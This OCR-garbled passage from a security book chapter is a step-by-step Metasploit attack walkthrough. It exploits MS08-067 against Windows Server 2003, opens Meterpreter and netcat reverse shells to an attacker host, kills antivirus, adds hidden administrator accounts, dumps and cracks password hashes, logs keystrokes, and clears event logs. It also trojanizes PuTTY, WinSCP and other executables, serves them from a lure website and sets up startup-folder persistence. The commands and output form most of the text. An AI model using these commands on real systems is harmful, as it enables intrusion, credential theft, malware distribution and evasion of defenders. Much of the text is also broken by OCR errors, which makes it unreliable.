need it in this case because the code was readily available on the Internet. However, that is 
not often the case. In many cases, you will need the Metasploit framework itself to launch the 
attack. 

Before I start the attack, I want to know the target OS on the victim. One way to discover this 
is by conducting an OS scan using Nmap. The Nmap program can be run from the msfconsole 
prompt. Type nmap —O followed by the IP address or fully qualified domain name (FQDN) of 


the victim. 


> nmap -O 192.168.1.250 
xec: nmap -O 192.168.1.25 


( http://nmap.org ) at 2010-11 
an report r 192.168. 50 
is up (0.0095 latency 
own: 982 c 
STATE SE 
open e 
open di 
open 
open 
open chargen 
open ftp 
open 
open 
open 
open 
open 
open 
open 
cp open 
cp open 
1028/tcp open 
1029/tcp open 


C Address: 8:6C:2 BE:C9:5D (VMware) 
> type: - 
Micro 
jetails Micr V ver 2003 SP1 or S 
Network Distance: 


OS detection performed r any incorrect t S = n ://nmap.org/submit/ 
Nmap done: 1 IP addr ( scanned in 3.61 
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In this case the exact OS and service pack level are reported. Now I can search for exploits that 
will work against a system running Windows 2003 Server SP2. Another way to get this informa- 
tion is to use the Live HTTP Headers plug-in if the target is running a web server. 

To add the Live HTTP Headers program: 


1. Open Firefox, go to www.google.com, and type add-ons. 
2. Search for the Live HTTP Header plug-in. 
3. Click Add to Firefox and then restart Firefox. 


Live HTTP Headers 


by Daniel Savard, Nikolas Coukouma 


81 reviews 
16,195 weekly downloads 


View HTTP headers of a page and while browsing. 


After adding the plug-in, browse to the website. Right click on the page and select View Page Info. 
Click the Headers button at the top of the page. Look for the response headers from the server in 
the bottom pane to identify the version of the web server software. 


b ig à 
E = 
General  Permssons Securty 
Request Headers 
Name. Value. a 
REQUEST GET / HTTPJ1.1 [al 
Host 192,168.1.250 (al 
User-Agent Mozila[S.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2,12) Gecko/20101026 Fi. 
Accept text/html, application/xhtml--xml, application xml;q=0.9,*/"*;q=0.8 v. 
€] m E 
Response Headers 
Name Value m 
Etag "8a6a7e3bcdf3ca1:583" la] 
\MicrosoftOfficeWebServer 5.0_Pub = 
X-Powered-By ASP.NET wl 
(el 4 (2) 
Save As... } Note: headers are from network. 


You could do some googling and discover that Microsoft Internet Information Services (IIS) 
version 6 is used on Windows Server 2003. But, in case you do not feel like googling, here is a 


handy chart: 


IIS 4.0 | NT4 


IIS 5.0 | Windows 2000 
IS 6.0 | Windows 2003 


IIS 7.0 | Windows 2008 


IIS 8.0 | My guess: the next server released 


A completely passive way to check the OS of a target is to go to www.netcraft.com. Put the 
FQDN of the target in the What's That Site Running box on the top left part of the screen. 


Hosting History 
IP address os Web Server Last changed 


7484.218.194 Windows Server 2003 Microsoft-IIS/6.0 6-Oct-2010 
74.84.218,194 Windows Server 2003 Microsoft-IIS/6.0 2-Sep-2010 
74.84.218.194 Windows Server 2003 Microsoft-IIS/6.0 19-Jul-2010 
7484.218.194 Windows Server 2003 Microsoft-IIS/6.0 4-Jun-2010 
74.84.218.194 Windows Server 2003 Microsoft-IIS/6.0 19-May-2010 


Netblock Owner 

Atlantic Business Technologies 8015 Creedmoor Rd. Suite 201-A Raleigh NC US 27613 
Atlantic Business Technologies 8015 Creedmoor Rd. Suite 201-A Raleigh NC US 27613 
Atlantic Business Technologies 8015 Creedmoor Rd. Suite 201-A Raleigh NC US 27613 
Atlantic Business Technologies 8015 Creedmoor Rd. Suite 201-A Raleigh NC US 27613 
Atlantic Business Technologies 8015 Creedmoor Rd. Suite 201-A Raleigh NC US 27613 


260 m Defense against the Black Arts 


One way to search for exploits specific to Microsoft OSs and their family of products is to type 
search ms0. In Metasploit, most of the exploits specific to Microsoft software (OS and applica- 
tion) start out with ms0, like windows/smb/ms08, 067 netapi. 


good 
good 
good 
n l 


ge 


ange2000 x 


Running the info command prior to the name of the exploit will provide you with details like 
which versions of the Microsoft OS are vulnerable. In the case of the windows/smb/ms08_067_ 
netapi exploit, there are 60 versions of Windows that are vulnerable, including 


B Windows XP SPO — SP3 
W Windows 2000 SPO - SP4 
WB Server 2003 SPO — SP2 


riptior 
xploits a parsing 
„dll 


ashing. 
itatic 
ta This 


pport for NX byp 
evelopment. 


/ cvename. cgi ?name-2 


bull 


This attack requires that you attack port 445 on the victim machine. That means this attack would 
probably zever work against a machine connected to the Internet. Machines connected to the 
Internet are almost always firewalled, and even if they have ports open, 445 is unlikely to be one 
of them. However, 445 is a port that is often open on a local area network (LAN). So this attack 
would most likely be initiated by someone within the LAN. Keep in mind that someone else on 
the same LAN as you might be connected to a hotspot or hotel network with you. Or, the attack 
could be from someone else residing on the inside of your network, like a student at a university. 
To successfully use this exploit, you need to know not only the OS, but also the patch level of 
the OS. Fortunately, there is an easy way to get this information using a scanner, which is one of 
Metasploit's auxiliary modules. 
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The following exploit works on a remote system running Windows XP, Windows 2000, or 
Windows Server 2003. To scan the host, type the following commands: 


E use scanner/smb/version 
B set RHOSTS 192.168.1.250 


E run 


Note: RHOSTS must match the IP aaddress or addresses on your network. 


nner/smb/smb versi 


j for the specified 
me to aut 


Unknown) (name:TRAINER| 


When typing the info command after viewing this exploit, you will see the full list of targets. 
In the cases of many exploits, automatic can be used. However, when I tried that with the win- 
dows/smb/ms08. 067 netapi exploit, it failed to connect. So, I scanned the host with the scanner/ 
smb/version to determine the patch level. The scanner informed me that the target is running 
Windows Server 2003 SP2. And since I am aware from googling that NX features are often turned 
on is this version of Windows, I am choosing 10 for my target. 


iliary 
exploit( 


Stack Corruptior 


sploit Framework 


d by: 
«hdmam sploit 
tt Moore «brett.r re@insomniasec.com> 


able ti 
Name 


Targ 

2000 rsal 
XP Sf SP1 Unive 
XP SP2 English 
XP SP3 


03 S al 
2003 SP1 English (NO NX) 
2003 1 English (NX) 
2003 1] Japanese (NO NX) 
2003 SP2 Engli NO NX 
2003 2 English (NX) 
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To exploit the remote system running Windows XP, Windows 2000, or Windows 2003, type 


use windows/ smb/ms08_067_netapi 

set RHOST 192.168.1.250 

set payload windows/meterpreter/reverse_tcp 
set LHOST 192.168.1.100 

set target 10 


exploit 
Note the following: 


B RHOST must match the IP address of the victim. 
LHOST must match the IP address of your attack machine. 
B Target must match the OS and SP level of the victim. 


192.168.1.250 


> set payload windows/meterpreter/rev 


-» windows/meterpreter 


168.1.100 


Description 
RHOST 92.168.1.250 target address 


RPORT € Set the SMB s ce port 
SMBPIPE BR 1 yt pipe name to use (BROWSER, 


)jptions (windows/meterpr 


Current Setting 


EXITFUN 
LHOST 


2003 SP2 English (NX) 


^ exploit 


After you type the exploit command, if the attack succeeds you will have a meterpreter shell. If 
you see the message sending stage, Metasploit is attempting to initiate a connection with the vic- 
tim. Once you see the message “meterpreter session opened,” you have successfully attacked the 
victim machine. 
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msf exploit(ms08 067 netapi) > exploit 


Started reverse handler on 192.168.1.100:4444 

Attempting to trigger the vulnerability... 

Sending stage (749056 bytes) to 192.168.1.250 

Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.258:1045) at 2010-11-01 09:26:49 +0000 


Type? to see a list of meterpreter commands. Some of the important commands include 


shell: Gets you a command prompt on the remote system. 

execute: Allows you to run a command, including a command prompt. 
upload: Allows you to upload files to the victim machine. 

download: Allows you to download files from the victim. 

ps: Lists processes. 

kill: Allows you to kill a process. 

keyscan. start: Starts the keylogger. 

keyscan dump: Dumps the content of the keylogger. 

reg: Allows you to edit the Windows registry. 

clearev: Clears events in the event viewer logs. 


Type use priv to see a list of additional meterpreter commands, including 


B getsystem: Allows you to use the system account, which has more power than administrator 
but is not typically utilized by users. 

B hashdump: Dumps the Windows hashes from the SAM file. 

B timestomp: Allows you to alter the time when files were created, modified, and accessed. 


When the execute —i —f cmd.exe command is typed, the user is presented with a Windows com- 
mand prompt. Type the sc query command to view started services. 


1. execute —i -f cmd.exe 
2. sc query 


SERVICE NAME: Norton AntiVirus Server 
DISPLAY NAME: Norton Antivirus Client 


TYPE : 110 WIN32 OWN PROCESS (interactive) 
STATE : 4 RUNNING 
(STOPPABLE, NOT PAUSABLE, ACCEPTS SHUTDOWN) 
WIN32 EXIT CODE : 0 (0x0) 
SERVICE EXIT CODE : © (0x0) 
CHECKPOINT : 0x0 
WAIT HINT : 0x0 


Another way to view the started services is by using net start. The net stop command will allow 
you to stop services, but not disable them. 


l. net start 
2. net stop “Norton AntiVirus Client” 


C:\WINDOWS\system32=net stop "Norton AntiVirus Client" 
net stop "Norton AntiVirus Client" 


he Norton AntiVirus Client service is stopping.. 
he Norton AntiVirus Client service was stopi 
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While you are in at a command prompt, you can also use the sc delete command to uninstall a 
service. In order to do this, you need to use the service name, not the display name. 

The service name can be enumerated by the sc query command. The net start command only 
displays the display name of the service, not the service name. In this case, the attacker types the 
following command to delete the antivirus service from the registry: 


l. sc delete *Norton Antivirus Server" 
2. Type exit to leave the command prompt environment and return to meterpreter. 


C: NWINDOWS" 


sc de 


[SC] DeleteService 


In order for the service to be gone, the system will have to be restarted. Even though meter- 
preter has a reboot command, the hacker would not do that until they were confident they had a 
way back into the system. The service will be disabled at this point anyway. Although the antivirus 
server service was uninstalled, that does not mean all of antivirus was uninstalled; only that spe- 
cific component of antivirus was removed. 'The meterpreter killav.rb script can be used to kill off 
all of the other components of antivirus. Typing the run killav command will kill off all of the 
other components of antivirus. 


meterpreter » run kill 
Killing Antivi C jn the target... 


Killi 


There are a large number of meterpreter scripts that can be utilized when you have a meter- 
preter command on the victim machine. Some of the Ruby scripts will harvest information from 
the compromised computer. Other scripts will allow the attacker to install additional software 
such as SSH, RDP, and VNC that will give the hacker additional avenues of access. 


root@bt:~-# ls /pentest/exploits/framework3/scripts/meterpreter/ 


arp scanner.rb file collector.rb metsvc.rb scheduleme.rb 
autoroute.rb get application list.rb migrate.rb schtasksabuse.rb 

checkvm. rb getcountermeasure. rb multicommand.rb scraper.rb 

credcollect.rb get env.rb multi console command.rb screen unlock.rb 

domain list gen.rb get filezilla creds.rb multi meter inject.rb search dwld.rb 
dumplinks.rb getgui.rb multiscript.rb service permissions escalate.rb 
duplicate.rb get local subnets.rb netenum. rb srt webdrive priv.rb 

enum chrome.rb get loggedon users.rb packetrecorder.rb uploadexec.rb 

enum firefox.rb get pidgin creds.rb panda 2007 pavsrv51l.rb virtualbox sysenter dos.rb 
enum logged on users.rb gettelnet.rb persistence.rb vnc.rb 

enum powershell env.rb — getvncpw.rb pmi driver config.rb win32-sshclient.rb 

enum putty.rb hashdump. rb powerdump.rb win32-sshserver.rb 

enum shares.rb hostsedit.rb prefetchtool.rb winbf.rb 

enum vmware.rb keylogrecorder.rb process memdump.rb winenum.rb 

event manager.rb killav.rb remotewinenum.rb wnic.rb 


To prove that antivirus is really gone, use the upload feature of meterpreter to upload Netcat, a 
file that is designated to be malicious by most antivirus vendors. Netcat is one of several Windows 
executable files located within the /pentest/windows-binaries folder on BackTrack. In this case, 
the attacker types the following commands to delete the antivirus service from the registry: 
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1. upload /pentest/windows-binaries/tools/nc.exe c:\\windows\\system32 
2. execute —i —f cmd.exe 


3. nc -h 


-binaries/tools 
inaries/tools/n 
aries/tools/nc.exe -> C:\w 2\\nc.exe 


nc 
[v1.10 NT] 
connect to re: nc [-options] hostname port[s] [po 
listen for nd: nc -l -p port [options] [hostr 
options: 

| from console, stealth mode 


am to exec [dangerous!!] 
outing hop point[ 
ting pointer: 4, € 


One you have Netcat working on the compromised system, schedule a job that sends anothers 
command shell from the victim machine to the attack machine. To do this, type the following on 
your attack box running BackTrack: 


B Open up a Netcat listener by typing nc -l -p 443. 


Note: Port 443 is commonly allowed through almost all firewalls. 


root@bt: ~ - Shell. Konsole <3 Fo “aie 


Session Edit View Bookmarks Settings Help 


:-4 nc -l 


In the meterpreter environment connected to the victim, type the following: 
1. time /t 

Note: Replace the time with 5 minutes after the current time displayed in Windows. 
2. at 15:30 nc 192.168.1.100 443 —e cmd.exe 


C:\WINDOWS\system32>time /t 
time /t 
03:16 PM 


C:\WINDOWS\system32>at 15:20 nc 192.168.1.100 443 -e cmd.exe 
at 15:20 nc 192.168.1.100 443 -e cmd.exe 
Added a new job with job ID = 1 


Once the time has elapsed, an additional command prompt should be sent to the attack system. It 
is always good to have a second connection in case the meterpreter session ends. 
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g root@bt: ~ - Shell - Konsole <5> i 
Session Edit View Bookmarks Settings Help 
root :-# nc -l -p 443 

Microsoft Windows [Version 5.2.3790] 
(C) Copyright 1985-2003 Microsoft Corp. 


C:\WINDOWS\system32>§§ 


The attacker can send a command prompt every day to the victim at a specified time by typing: 
1. at 16:00 /every:m,t,w,th,f,s,su nc 192.168.1.100 —e cmd.exe 


Minimize your additional shell and go back to the shell connected to meterpreter. Wreak havoc 
on the system by typing the following commands: 


. net user guest /active:yes 

. net user guest P@sswOrd 

. net user “SYSTEM ” P@sswOrd /add 

. net user “LOCAL SERVICE ” P@sswOrd /add 

. net localgroup administrators guest “LOCAL SERVICE ” “SYSTEM ” /add 
. net localgroup administrators 

. net user administrator /active:no 

. net user administrator /comment:0wned 


o jo Und WN 


Note: There is a space after the names SYSTEM and LOCAL SERVICE. The built-in adminis- 
trator account can be disabled in Windows XP and higher (but is disabled by default in Vista and 
Windows 7). 


{GY Shortcut to cmd.exe - nc -I -p 443 -lox 


e complete and unrestricted a 


er administr 
t user administ r 
e command completed successf 
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The hacker may enable accounts or, with Vista and Windows 7, the built-in administrator account 
is disabled by default, so using it may not even set off alarms for users. Another thing that hackers 
will want is passwords. The hashdump utility will obtain the password hashes from the registry. 
To obtain the Windows passwords hashes using Metasploit’s hashdump, 


1. Type exit to leave the command prompt and return to a meterpreter shell. 


2. hashdump 


Once the hashes are dumped, you can use a tool like John the Ripper or Cain and Abel, or just 
go to the website www.nediam.com.mx. If you want to use the website, the first hash is the lan 
manager (LM) hash and the second hash is the new technology (NT) hash. For Vista and higher, 


you need to get the NT hash. 


Windows Hashes Repository - Search NT Hash - Mozilla Firefox 


File Edit View History Bookmarks Tools Help 
€ > - © X X | @/http://nediam.com.mx/winhashes/search_ 


@Black Hat MBackTrack Linux MOffensive-Security @Tiger Security 
[© NEDIAM.COM.M... x | Ə Windows Hashe... * 


ajea 


Windows Hashes à " 
Generator Windows Hashes Repository 1.0 

Search Plaintext Search NT Hash 
Password 

Search LM Hash 

PASSWORD :toor: 
LM HASH :a9a1d510b01177d1aad3b435b51404ee: 
NT HASH :afc44ee7351d61d00698796da06b1ebf: 

Statistics 

Credits Search for another NT hash 

Done 


meterpreter » screenshot 
Screenshot saved to: /root/yPYtClta.j 


The screenshot will be sent to your desktop and can be opened with the Firefox browser. Form 
this screenshot it appears that no one is logged in at the current time. 
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file:///root/yPYtClta.jpeg - KView 


File Edit View Go Tools Settings Help 


7 3 Windows Server2003 
JW. Enterprise Edition 


ep. Press Ctr-Alt-Delete to begin. 


Requiring this key combination at startup helps keep your 
computer secure. For more information, dick Help. 


427,9 | 800x600 | 


Capture the username and password at login by completing the following steps: 
1. ps 
2. migrate 368 

Note: Use the process ID (PID) for winlogon.exe. 


3. keyscan_start 
4. keyscan_dump 


Even though you obtained the password from cracking the hash, it is always good to have an alter- 
native method. This administrator could not log in because the account was locked out. 

The remote desktop protocol (RDP) can be enabled on the victim machine by using the getgui 
meterpreter script. The script will enable RDP and change the startup type of the service to auto- 
matic, even if it was previously set to disabled. It will also open the firewall port for 3389. 


Metasploit m 269 


Setting Terminal S 
The Terminal 


Opening port i 


For cleanup use 


Once RDP has been enabled, the user can RDP to the victim box. In order to use remote 
desktop from a machine running Windows, type mstsc at the run box and do the following: 


. Click the Options tab. 

. Click Local Resources. 

3. Click More. 

4, Select Drives, Plug and Play Devices, and Serial Ports. 
5. Click OK. 

6. Click General. 

7. Type in the IP address and click Connect. 


Ne 


7 
“m Remote Desktop Connection E3 


- Remote Desktop 


aL Connection 
-— 


Local devices and resources 
Choose the devices and resources on this computer that you want to 
use in your remote session. 
[7] Smart cards 
[7] Serial pots 
| & E Drives 
'Supporied Plug 


Which Plug and Play devices can | use in my remote session? 


Use one of the accounts created earlier to log on to the server. If the SYSTEM account is used, a 
space after the word must be used in the username field. 


“a 192.168.1.250 - Remote Desktop Wok 


wen: [0 
pasword: [esses | 


mm C | ee ee 


Once the hacker has logged in, they can search for files on the victim system including PDF 
files, Excel files, Word documents, Powerpoints, and other files. 
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Bi search Results 


File Edit View Favorites Tools Help 
O Ek - © - (T ||P search C Folders | M- 


Search by any or all of. 4 
the criteria below. 


All or part of the file 
name: 


E NN 


When connected via RDP with local resources enabled, the attacker can copy items from your 
desktop (or drives) to the victim machine and copy items from the victim to your machine. 


" 


After the hacker has finished gathering data from the target, they can clear the event logs by 
using the clearev command within meterpreter. Clearing logs is a way for a hacker to attempt to 
hide the sequence of events from someone who may investigate the intrusion. However, the fact 
that the logs have been cleared may also be an indication that an intrusion has occurred. 


Wiping 


Wiping 
Wiping 933 r 


The clearev command will delete almost all of the application, system, and security logs from 
the event viewer. However, there will be a log entry left in the security log that indicates the secu- 
rity log was cleared. Later versions of Windows will also log the fact that logs other than the 
security log have been cleared. For this reason, the hacker will often delete the security log last. 


axi 
Event | 


Date: 11/9/2010 Source: Security 
Time: 9:06:15 PM Category: System Event 


me 
Type: — SuccessA EventID: 517 Eu 
8e | 


Description: 


cleared 
Primary User Name: SYSTEM 
Primary Domain: NT AUTHORITY 
Primary Logon ID: 


i (Ox0.0x3E 7) 
Client User Name: SYSTEM 

Client Domain: NT AUTHORITY 
Client Logon ID: — (0x0.0x3E 7) 


For more information, see Help and Support Center at zi 
Dax € Bytes C Words 
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Payload into EXE 


The latest version of Metasploit gives the user the ability to encode an .exe file with a payload. 
Older hacking tools that gave away the fact that they were not what the user supposed to open by 
displaying an unfriendly blue and white icon: 


‘These types of payloads might have tricked people initially, but even most people who have 
only been using computers for a few weeks would be hesitant to click on an executable file if there 
wasn't any type of icon associated with it. Even if someone was foolish enough to click on a file 
like bad.exe, viruses like these would be picked up by anti-virus (AV) even with old definitions. 
Metasploit is a game changer; the days of payloads with bad icons easily picked up by AV are over. 
Metasploit gives users the ability to put a payload into an existing executable that will not likely 
be detected by AV and will proceed right though the Windows firewall. Most people are unlikely 
to be suspicious if they click an .exe file and it runs as expected while a shell is connected to an 
attack machine in the background. Even if people have a number of years of experience, they are 
unlikely to notice that their machine is now Owned. In the following image, one of these files has 
a malicious payload and the other is the legitimate file downloaded directly from the vendor. Can 
you tell which file is legitimate and which file is malicious? 


SFTP, FTP and SCP client 


4301029 
1/10/2010 10:04 PM 


version: 4. 
Date created: 11/9/2010 9:37 PM 1 
Size: 6,03 MB d 


Even a well-seasoned veteran of computer security isn't going to be able to easily notice if they 
open a program and it does what it is supposed to while opening a backdoor to an attacker. This 
is especially true if that program evades the detection of antivirus and passes through the firewall. 
The one thing that can save you in a situation like this is to get your software files from a reliable 
trustworthy site, not just anywhere on the Internet. Some software manufactures provide an md5 
or shal hash for their file on the website; the hash can help you determine if the software you 
download has not been altered by a person with malicious intent. For example, another SSH client 
provides the md5sums for all of the downloads available on their website. When I google “Putty,” 
the developer of the software is first on the list. This may not always be the case, as some time you 
will be directed to third parties to download software. 


For Windows on Intel x86 


PuTTY: putty.exe (or by FTP) RSA sig) DSA sig) 
PulTYtet puttytel exe (or by FTP) RSA sig) DSA sig) 
PSCP: pscp.exe (or by FTP) (RSA sig) (DSA sig) 
PSFTP: psftp.exe (or by FTP) (RSA sig) (DSA sig) 
link: plink exe (or by FTP) (RSA sig) SA sig) 
Pageant: pageant exe (or by FTP) (RSA sig) (SA sig) 
PulTYgen: en. exe (or by FTP) (RSA sig) (DSA sig) 
A .ZIP file containing all the binaries (except PuTTYtel), and also the help files 

Zip file: putty.zip (or by FTP) (RSA sig) (DSA sig) 
A Windows installer for everything except PuTTYtel 

Installer: putty<version>-installer.exe RSA sig) DSA sig) 


MDS checksums for all the above files 
MDSsums:  md5sums &————— (orbyFTP)  (RSAsig)  — (DSA sig) 
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By clicking on the md5sums, we can see that the md5 hash for the file listed by the developer 
is 8604901c603bcf9c9e80c8b613f2943b. I get the same hash when I hash the file after download. 


6c324c3282011bc779c015f16748e879 x&6/pageant.exe ^ 1 MD5 Hash X 
271451239dd4b9aa84931d949852ad92 x86/plink.exe 2 
c60cf70003218b42d430f41823f1d67f  x86/pscp.exe 
657e5b87511380cfe25d1de65f2554ee  x86/psftp.exe £ 
86d4901c603bcf9c9e80c8b613f2943b x86/putty.exe vi 
[€] T > 


Hash: |86d4901c603bcfScSe80c8b61 3'2943b 


OK | 


A person could con people into downloading their loaded version of the software by increasing 
their Google rankings or by using various social engineering techniques. Some of the techniques 
that can be utilized to increase your Google rankings include visiting forums and posting links to 
the website you are trying to get people to use. Another trick could be posting links on Twitter or 
Facebook and getting your users to click them. Once executed, the file will open as expected while 
in the background a connection to the attackers machine is launching. These encoded exploits 
will work on every Windows OS including Windows 7 and Server 2008. 


jessevarsalone jesse varsalone 
Putty, a great SSH tool. http-//bit ly/4tU14r 


These payloads can be added to executables by using the msfpayload and msencode programs 
of Metasploit. First the user needs to download or obtain the legitimate executable files. For this 
example, I will be trojanizing the following files on my “Great Downloads” site: 


B Scanning tools 
— ipscan.exe 
— scanline.exe 
W SSH tools 
— WinSCP.exe 
— Putty.exe 
E Windows.exe 
— Mspaint.exe 


After the legitimate .exe files are copied over to a machine running Metasploit, an output directory 
is created (loaded). The files can then be trojanized by typing the following commands: 


1. msfpayload windows/meterpreter/reverse tcp LHOST-192.168.1.100 LPORT-443 R 
| msfencode -t exe -x /home/ubuntu/Desktop/ipscan.exe -k -o /home/ubuntu/loaded/ 
ipscan.exe -e x86/shikata ga nai-c5 

2. msfpayload windows/meterpreter/reverse tcp LHOST-192.168.1.100 LPORT-80 R | 
msfencode -t exe -x /home/ubuntu/Desktop/sl.exe -k -o /home/ubuntu/loaded/sl.exe -e 
x86/shikata ga nai-c5 

3. msfpayload windows/meterpreter/reverse tcp LHOST-192.168.1.100 LPORT-22 R | 
msfencode -t exe -x /home/ubuntu/Desktop/WinSCP.exe -k -o /home/ubuntu/loaded/ 
WinSCP.exe -e x86/shikata ga nai-c5 
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4. msfpayload windows/meterpreter/reverse tcp LHOST=192.168.1.100 LPORT=22 R 
| msfencode -t exe -x /home/ubuntu/Desktop/putty.exe -k -o /home/ubuntu/loaded/ 


putty.exe -e x86/shikata ga nai-c5 


5. msfpayload windows/meterpreter/reverse tcp LHOST-192.168.1.100 LPORT=53 R | 
msfencode -t exe -x /home/ubuntu/Desktop/mspaint.exe -k -o /home/ubuntu/loaded/ 


mspaint.exe -e x86/shikata ga nai -c 5 


ubuntu@ubuntu:~$ msfpayload windows/meterpreter/reverse tcp LHOST=192.168.1.100 LPORT=22 R 
| msfencode -t exe -x /home/ubuntu/Desktop/WinSCP.exe -k -o /home/ubuntu/loaded/WinSCP.exe 


-e x86/shikata ga nai -c 5 
[*] x86/shikata ga nai succeeded with size 318 


x86/shikata ga nai succeeded with size 345 
x86/shikata ga nai succeeded with size 372 
x86/shikata ga nai succeeded with size 399 


x86/shikata ga nai succeeded with size 426 


(iteration=1) 
(iteration=2) 
(iteration=3) 
(iteration=4) 


(iteration=5) 


The loaded directory contains the trojanized files that can be uploaded to the web server. 


loaded - rile Browser 


File Edit View Go 


Bookmarks Help 


e - - ? wI ue» = 
Back a Up i Reload Home 
ioe EET 
Places ~ a 

& ubuntu » x » 

fal Desktop Ipscan.exe mspaint.exe 
L— File System D 

— Floppy 1 D 

I CD-ROM 1 putty.exe sl.exe 


$ 


WinSCP.exe 


4 items, Free space: 4.4 GB 


The next step for the attacker is to create their website and provide links to their loaded soft- 
ware. 'Iheir files can be hosted on a variety of OSs using any type of web server software. It does 
not matter if the website is running Apache or Microsoft IIS. Here are the directions to set up an 


IIS web server on Windows 2003: 


1. Go to Start, Settings, Control Panel. 
2. Add or Remove Programs. 

3. Add Windows Components. 

4. Add Application Server. 

5. Click IIS and click Details. 

6. Select World Wide Web Server. 


7. Click OK twice, and provide the location of the 1386 files on your CD-ROM. 
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Internet Information Services (ITS) E xj 


To add of remove a component, click the check box. A shaded box means that only part 
of the component 


will be installed. To see what's included in a component, click Details. 


Ivi ^£ Intemet Information Services Manager 1.3MB 
O Gf intenet Printing 0.0 MB 
(NNTP Service 1.0MB 
O SMTP Service 1.2 MB 
I @ World Wide Web Service 80MB 


Description: Enables Microsoft FrontPage authoring and administration. Note: Enables 
Indexing Service. 


Total disk space required 124MB Detail: 
Space available on disk: 4740.2 MB [m 
[Le ] c | 


The attacker will then place all of the files in the inetpub\wwwroot folder. 


S; C:\Inetpub\wwwroot 


File Edit View  Favortes Ir 
QBak - O - f? | P seara 
Address = C:\Inetpub\wewwroot 
Name 


putty.exe 
mspaint .exe 
sf ipscan.exe 
sl.exe 
def auk .htm 


Bvmscp.exe | 
E esent] 


Then, they can create a default.htm file in the inetpub\wwwroot folder with similar HTML 
code: 


<html> 

<body> 

<hisIndex of /utilities/Jesse</h1> 

li»«a href-"readme.txt"» readme.txt</a></li> 
hi>Scanning Tools</h1> 

li»«a href-"ipscan.exe"« ipscan.exe</a></li> 
li»«a href-"sl.exe"» sl.exe</a></li> 

h15SSH Tools-/h1» 

li»«a href-"WinSCP.exe"» WinSCP.exe</a></li> 
li»«a href-"putty.exe"» putty.exe</a></li> 
hi»Windows Tools-/h1» 

<li><a href=“mspaint.exe”> mspaint.exe</a></li> 
</ul> 

<address>IIS Server Port 80</address> 


</body></html> 


< 
< 
< 
< 
< 
< 
< 
< 


The attacker needs to start a listener on their attack machine running Metasploit. In order to do 
this, the versatile multihandler can be used. After exploit is typed, the attacker will sit and wait 
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for someone to launch the malicious payload and then a connection will open to the victim. To 
use the multihandler with the correct options in Metasploit 


. Type msfconsole from the command line. 

. use multi/handler 

. set PAYLOAD windows/meterpreter/reverse tcp 
. set lhost 192.168.1.100 

. set lport 22 

. exploit 


QN num Uo LbP-— 


Note: Running the exploit command with the -z -j switch will allow multiple machines to 
connect. 


When the handler is listening, the message "Starting the payload handler" will be displayed. 


msf > use multi/handler 

msf exploit(handler) » set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

msf exploit(handler) » set lhost 192.168.1.100 

lhost => 192.168.1.100 

msf exploit(handler) » set lport 22 

lport => 22 

msf exploit(handler) » exploit 

[*] Started reverse handler on 192.168.1.100:22 
[*] Starting the payload handler... 


The victim will need to visit the website hosting the trojanized version of the malware. 


[E http://192.168.1.250. +] a] 4] x ET P | 
iy Favorites | Jig @ Suggested Sites v. ig) Web Slice Gallery v 


[Bg || Navigation Canceled | Æ Indexof/utiiesJese x | | @ > B) + (3 d v Pager Sefetye Tooke @r 


Index of /utilities/Jesse 


— This site 


Scanning Tools 


=“ — looks 


SSH Tools 


:===— Awesome!!! 
Windows Tools 


e mspaint exe 


IIS Server Port 80 


"| http://192:168.1.250/WinSCP.exe @ Intemet | Protected Mode: On fav Rio% ~ 


10:54 PM 
11/10/2010 
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The victim will then need to download and execute the file with the malicious payload. 


Do you want to run or save this file? 


E 1 Name: WinSCP.exe 
Type: Application, 6.03MB 
From: 192.168.1.250 


(An J( sw )( eme ) 


While files from the Intemet can be useful, this file type can 
potentially ham your computer. ff you do not trust the source, do not 
fun or save this software. What's the risk? 


No worries here: I have a firewall and my antivirus definitions are up to date. (Ihe program 
opens!) The program runs as expected, so the user has no need to be suspicious of anything. 


MP Windows Firewall with Advanced Security 
File Action View Help 
4 » |) ah Stored sessions Host name: Pog number: 
[oS 1 ] 22 el] 
0 ie et en IT Iss. 
IE Inbound Rules E Username: Password. 


E$ Outbound Rules d Be eg P MS Preferences 
Big Connection Security Rules | — 


b VÀ Monitoring 


Overview zi 
Domain Profile 
@ Windows Frewal is on. Protocol 

© inbound connections that do not af Eje protocol [V] Alow SCP fallback 


@ Outbound connections that do not} 


Private Profile 


m m3 Um] (imme) 
@ Outbound connections that do not! 
Public Profile is Active 

@ Windows Frewal is on. 

{© inbound connections that do not match a rule are blocked. 


@ Outbound connections that do not match a nde are allowed. 


E Windows Frewal Properties 


Getting Started a 
Authenticate communications between computers 


Create connection securty rules to specfy how and when connections between computers are authenticated and 
protected by using Intemet Protocol securty (IPsec). 


: Cera ir ike a ae 


Once a victim connects to the attack machine, the message “Meterpreter session opened” will 
appear. The attacker has been waiting for this moment and now controls the remote machine. 


[*] Sending stage (749056 bytes) to 192.168.1.3 
[*] Meterpreter session 1 opened (192.168.1.100:22 -> 192.168.1.3:49706) at 2010 
-11-10 23:05:05 -0500 


This may bring up a deep theological question: Who is the attacker really? The attacker can 
run the getuid command at his meterpreter shell to determine their level of permissions. Type 


1. getuid 


meterpreter > getuid 
Server username: person-PC\person 
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If the attacker is smart, they will immediately create another backdoor to the system. 


They can do this by creating another msfpayload using a different port. This can be done by 
typing the following command: 


msfpayload windows/meterpreter/reverse_tcp Ihost-192.168.1.100 Iport-53 X > hotfix.exe 


ubuntu@ubuntu:~$ msfpayload windows/meterpreter/reverse tcp Lhost=192.168.1.106 lporte53 
X » hotfix.exe 

Created by msfpayload (http://www.metasploit.com). 

Payload: windows/meterpreter/reverse tcp 

Length: 290 

Options: lhost=192.168.1.100, lport=53 


The attacker needs to put the malware into a place where it will automatically execute when the 
user logs in to their system. One option is to place the executable into their startup folder, which 
is C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs. After 
navigating to this folder in meterpreter using the cd command, the attacker can upload by typing 


upload /home/ubuntu/Desktop/hotfix.exe 


Note: The pwd command is used to verify the directory. The dot is for the present directory. 


meterpreter > pwd 

C:\Users\person\appdata\roaming\microsoft\windows\start menu\programs\startup 
meterpreter > upload /home/ubuntu/Desktop/hotfix.exe . 

[*] uploading : /home/ubuntu/Desktop/hotfix.exe -> . 

[*] uploaded  : /home/ubuntu/Desktop/hotfix.exe -> .\hotfix.exe 


The attacker will then start another multihandler listener on the new designated port with the 
correct lport and lhost options. Open a new terminal and type the following commands: 


